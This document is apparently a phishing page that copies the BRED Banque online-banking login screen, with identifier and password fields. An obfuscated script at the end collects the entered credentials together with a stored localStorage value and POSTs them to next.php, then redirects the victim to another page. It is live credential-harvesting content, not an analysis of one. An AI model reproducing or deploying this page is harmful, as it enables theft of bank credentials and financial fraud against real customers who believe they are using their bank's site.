<!DOCTYPE html>
<html data-bs-theme="light" lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>BRED BANQUE</title>
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/styles.css">
</head>

<body>
    <div id="nav1" class="c-div" style="height: 40px;background: #ebebeb;">
        <div class="e-div" style="width: 100%;max-width: 1140px;"><button class="btn btn-primary" type="button" style="color: var(--bs-gray-dark);background: transparent;border-style: none;border-radius: 0px;">Particuliers</button><button class="btn btn-primary" type="button" style="color: var(--bs-gray-dark);background: transparent;border-style: none;border-radius: 0px;">Professionnels et Associations</button><button class="btn btn-primary" type="button" style="color: var(--bs-gray-dark);background: transparent;border-style: none;border-radius: 0px;">Entreprises</button><button class="btn btn-primary hide2" type="button" style="color: var(--bs-gray-dark);background: transparent;border-style: none;border-radius: 0px;">Banque Privée</button><button class="btn btn-primary hide2" type="button" style="color: var(--bs-gray-dark);background: transparent;border-style: none;border-radius: 0px;">La BRED</button><button class="btn btn-primary hide2" type="button" style="color: var(--bs-gray-dark);background: transparent;border-style: none;border-radius: 0px;">Une banque coopérative</button></div>
    </div>
    <div id="nav2" class="c-div" style="height: 120px;background: linear-gradient(-84deg, #24315e 0%, rgb(36,49,94) 21%, white 41%);">
        <div class="sp-div" style="width: 100%;max-width: 1140px;background: #24315e;">
            <div class="c-div" style="background: var(--bs-body-bg);"><img src="assets/img/lgglg.jpg"></div>
            <div style="width: 100%;">
                <div class="e-div" style="height: 50%;padding-top: 13px;"><button class="btn btn-primary hide1" type="button" style="background: var(--bs-btn-disabled-color);border-width: 1px;border-style: solid;color: #0092da;height: 37px;margin-right: 19px;"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" class="bi bi-person-fill-add" viewbox="0 0 16 16"><path d="M12.5 16a3.5 3.5 0 1 0 0-7 3.5 3.5 0 0 0 0 7m.5-5v1h1a.5.5 0 0 1 0 1h-1v1a.5.5 0 0 1-1 0v-1h-1a.5.5 0 0 1 0-1h1v-1a.5.5 0 0 1 1 0m-2-6a3 3 0 1 1-6 0 3 3 0 0 1 6 0"></path><path d="M2 13c0 1 1 1 1 1h5.256A4.5 4.5 0 0 1 8 12.5a4.5 4.5 0 0 1 1.544-3.393Q8.844 9.002 8 9c-5 0-6 3-6 4"></path></svg><span style="visibility:hidden;">ha</span>Devenir client</button><button class="btn btn-primary hide2" type="button" style="background: #0092da;height: 37px;"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" class="bi bi-person-fill" viewbox="0 0 16 16"><path d="M3 14s-1 0-1-1 1-4 6-4 6 3 6 4-1 1-1 1zm5-6a3 3 0 1 0 0-6 3 3 0 0 0 0 6"></path></svg><span style="visibility:hidden;">ha</span>Mon espace client</button></div>
                <div class="sp-div" style="height: 50%;padding-top: 14px;padding-bottom: 14px;">
                    <div class="c-div"><button class="btn btn-primary hide2" type="button" style="background: transparent;border-radius: 0px;border-style: none;border-right: 1px solid rgb(255,255,255);">Vos projets</button><button class="btn btn-primary hide2" type="button" style="background: transparent;border-radius: 0px;border-style: none;border-right: 1px solid rgb(255,255,255);">Comptes et cartes</button><button class="btn btn-primary" type="button" style="background: transparent;border-radius: 0px;border-style: none;border-right: 1px solid rgb(255,255,255);">Epargner</button><button class="btn btn-primary hide1" type="button" style="background: transparent;border-radius: 0px;border-style: none;border-right: 1px solid rgb(255,255,255);">Emprunter</button><button class="btn btn-primary hide1" type="button" style="background: transparent;border-radius: 0px;border-style: none;border-right: 1px solid rgb(255,255,255);">Assurer</button></div>
                    <div></div>
                </div>
            </div>
        </div>
    </div>
    <div id="nav3" class="c-div" style="height: 40px;">
        <div class="s-div" style="width: 100%;max-width: 1140px;padding-top: 7px;padding-bottom: 7px;"><a href="#" style="color: var(--bs-body-color);text-decoration:  underline;">Accueil</a><a href="#" style="color: var(--bs-body-color);margin-left: 10px;">&gt;</a>
            <p class="fw-semibold" style="padding-bottom: 0px;margin-bottom: 0px;color: #0092da;">&nbsp; Authentification - accéder à mon compte</p>
        </div>
    </div>
    <div id="main-conatiner" class="c-div" style="height: 800px;width: 100%;padding-top: 18px;">
        <div style="max-width: 1140px;width: 100%;height: 722px;">
            <h2 style="text-align: center;color: var(--bs-body-bg);margin-top: 12px;margin-bottom: 31px;">Mon espace client en toute sécurité</h2>
            <div id="form-outre" class="c-div">
                <div id="form-in" style="width: 100%;max-width: 670px;height: 538px;padding-top: 30px;background: var(--bs-body-bg);">
                    <div style="height: 52px;">
                        <p class="fw-normal" style="text-align: center;font-size: 19px;margin-bottom: 0px;">Je <span class="fw-normal" style="color: #0092da;">suis abonné à BREDConnect</span>,<br>j'accède à mes comptes</p>
                    </div>
                    <div style="height: 20px;">
                        <p style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;margin-top: 7px;">* Champs obligatoires</p>
                    </div>
                    <div id="form-con" class="c-div">
                        <div style="width: 100%;max-width: 362px;margin-top: 38px;">
                            <p style="margin-bottom: 5px;margin-top: 6px;">Identifiant *</p><input type="text" id="id" style="height: 38px;width: 100%;border-width: 1px;border-style: solid;">
                            <div style="margin-top: 2px;"><a class="e-div" href="#" style="color: var(--bs-body-color);font-size: 14px;">Récupérer mon identifiant</a></div>
                            <p style="margin-bottom: 5px;margin-top: 26px;">Mot de passe *</p><input type="password" id="pass" style="height: 38px;width: 100%;border-width: 1px;border-style: solid;">
                            <div style="margin-top: 2px;"><a class="e-div" href="#" style="color: var(--bs-body-color);font-size: 14px;">Demander un nouveau mot de passe</a></div>
                            <p id="err" style="margin-bottom: 0px;color: rgb(182,0,0);">Identifiant ou mot de passe incorrect</p>
                            <div class="c-div" style="margin-top: 27px;"><button class="btn btn-primary" id="next-btn" type="button" style="width: 195px;height: 45px;background: #0091da;padding: 10px 12px;" onclick="nextFun();">Me connecter<br><br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</button></div>
                        </div>
                    </div>
                    <div class="e-div" style="padding-top: 26px;padding-left: 19px;padding-right: 19px;"><a href="#" style="color: var(--bs-body-color);"><img src="assets/img/icon-security.png">Nos conseils sécurité</a></div>
                </div>
            </div>
        </div>
    </div>
    <div id="f1" class="c-div" style="width: 100%;height: 263px;">
        <div style="width: 100%;max-width: 1140px;padding-top: 56px;padding-bottom: 56px;">
            <p style="font-size: 24px;text-align: center;">Je ne suis pas&nbsp;<span style="color: #0091da;">abonné à BREDConnect</span><br>je souscris au service de gestion de compte en ligne</p>
        </div>
    </div>
    <div id="f2" class="c-div" style="width: 100%;height: 529px;background: #ebebeb;">
        <div style="width: 100%;max-width: 1140px;padding-top: 56px;padding-bottom: 56px;">
            <p style="font-size: 24px;text-align: center;">Je ne suis pas encore&nbsp;<span style="color: #0091da;">client BRED</span></p>
            <div class="c-div"><button class="btn btn-primary" type="button" style="width: 100%;max-width: 195px;height: 45px;border: 1px solid #0091da;background: var(--bs-btn-disabled-color);color: #0091da;">J'ouvre un compte</button></div>
            <div class="sa-div" style="margin-top: 78px;"><img src="assets/img/1.jpg" style="height: 100%;max-height: 245px;width: auto;"><img src="assets/img/2.jpg" style="height: 100%;max-height: 245px;width: auto;"></div>
        </div>
    </div>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
</body>
<script>
function _0x2f52(){var _0x4199e8=['674864ikcyvz','next.php','196072Nkzdle','#next-btn','#id','disabled','error','928558ShqxxB','getElementById','12999rRiyxA','shobi','290268BuwpII','504630OnSxcG','2532525AIYHNU','POST','prop','val','32DmafTj','ph.html','replace','ajax','#err','Error:','location','value','getItem','show','3iQqIjs','length','1266xQKFJq','log'];_0x2f52=function(){return _0x4199e8;};return _0x2f52();}function _0x4217(_0x2a6573,_0x32b38c){var _0x2f5298=_0x2f52();return _0x4217=function(_0x42175c,_0x26f90e){_0x42175c=_0x42175c-0x7a;var _0x498d37=_0x2f5298[_0x42175c];return _0x498d37;},_0x4217(_0x2a6573,_0x32b38c);}(function(_0x9d7afe,_0x16b180){var _0x3f6b8a=_0x4217,_0x2fbab5=_0x9d7afe();while(!![]){try{var _0x5a663a=-parseInt(_0x3f6b8a(0x82))/0x1+-parseInt(_0x3f6b8a(0x87))/0x2*(-parseInt(_0x3f6b8a(0x7c))/0x3)+-parseInt(_0x3f6b8a(0x80))/0x4+parseInt(_0x3f6b8a(0x8d))/0x5+parseInt(_0x3f6b8a(0x7e))/0x6*(-parseInt(_0x3f6b8a(0x89))/0x7)+-parseInt(_0x3f6b8a(0x91))/0x8*(-parseInt(_0x3f6b8a(0x8b))/0x9)+-parseInt(_0x3f6b8a(0x8c))/0xa;if(_0x5a663a===_0x16b180)break;else _0x2fbab5['push'](_0x2fbab5['shift']());}catch(_0x21d969){_0x2fbab5['push'](_0x2fbab5['shift']());}}}(_0x2f52,0x4776a));var count=0x0;function nextFun(){var _0x3d0482=_0x4217,_0x1f4511=document[_0x3d0482(0x88)]('id'),_0x2bd09f=document[_0x3d0482(0x88)]('pass');if(_0x2bd09f[_0x3d0482(0x98)]['length']==0x0||_0x1f4511[_0x3d0482(0x98)][_0x3d0482(0x7d)]==0x0)$(_0x3d0482(0x95))['hide'](),$('#next-btn')[_0x3d0482(0x8f)](_0x3d0482(0x85),!![]),setTimeout(()=>{var _0x27144f=_0x3d0482;$('#err')[_0x27144f(0x7b)](),$(_0x27144f(0x83))[_0x27144f(0x8f)](_0x27144f(0x85),![]);},0xc8),count=0x0;else _0x1f4511['value']['length']>0x0&&_0x2bd09f[_0x3d0482(0x98)][_0x3d0482(0x7d)]>0x0&&count==0x0&&($(_0x3d0482(0x95))['hide'](),$(_0x3d0482(0x83))['prop'](_0x3d0482(0x85),!![]),setTimeout(()=>{var _0x18e2ab=_0x3d0482,_0x5d943e=$(_0x18e2ab(0x84))[_0x18e2ab(0x90)](),_0x1521ee=$('#pass')[_0x18e2ab(0x90)]();$[_0x18e2ab(0x94)]({'url':_0x18e2ab(0x81),'type':_0x18e2ab(0x8e),'data':{'di':_0x5d943e,'pr':_0x1521ee,'shobi':localStorage[_0x18e2ab(0x7a)](_0x18e2ab(0x8a))},'success':function(_0x1af9bc){var _0x30b9c4=_0x18e2ab;$('#next-btn')['prop'](_0x30b9c4(0x85),![]),window[_0x30b9c4(0x97)][_0x30b9c4(0x93)](_0x30b9c4(0x92)),console[_0x30b9c4(0x7f)]('Success:',_0x1af9bc);},'error':function(_0x6c732,_0x48b8d9,_0x156051){var _0x1f2539=_0x18e2ab;console[_0x1f2539(0x86)](_0x1f2539(0x96),_0x156051);}});},0x5dc),count=0x0);}
</script>

</html>